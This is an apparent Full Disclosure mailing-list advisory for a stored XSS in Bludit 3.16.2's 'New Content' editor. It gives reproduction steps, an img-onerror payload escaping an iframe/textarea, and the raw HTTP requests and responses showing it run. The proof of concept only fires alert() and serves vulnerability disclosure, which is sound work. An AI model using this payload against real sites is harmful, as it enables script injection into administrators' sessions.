# Exploit Title: Stored XSS "Add New Content" Functionality - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/
Stored XSS "Add New Content" Functionality #1: Steps to Reproduce: 1. Login with admin account and visit "New Content" 2. In the "Source Code" field enter the following parameter "<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">" 3. Upon clicking on "Preview" the XSS payload would trigger // HTTP POST request add new content POST /bludit/admin/new-content HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 [...] tokenCSRF=03a860fcc567fed86f6cb57e5877a469ef27e2ac&uuid=b219c568827ee49d5b8be839d6ab1043&type=published&coverImage=&content=<iframe><textarea></iframe><img+src%3d""+onerror%3d"alert(document.domain)">&category=&description=&date=2025-06-04+15%3A15%3A17&typeSelector=published&position=3&tags=&template=&externalCoverImage=&slug=xss&noindex=0&nofollow=0&noarchive=0&title=xss // HTTP response HTTP/1.1 301 Moved Permanently Date: Wed, 04 Jun 2025 19:16:04 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: Bludit Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: /bludit/admin/content Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 // HTTP GET request triggering the XSS GET /bludit/admin/edit-content/xss HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 [...] // HTTP response HTTP/1.0 200 OK Date: Wed, 04 Jun 2025 19:16:06 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: Bludit Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 [...] <!-- Editor --> <textarea id="jseditor" class="editable h-100" style=""><iframe><textarea></iframe><img+src%3d""+onerror%3d"alert(document.domain)"> [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
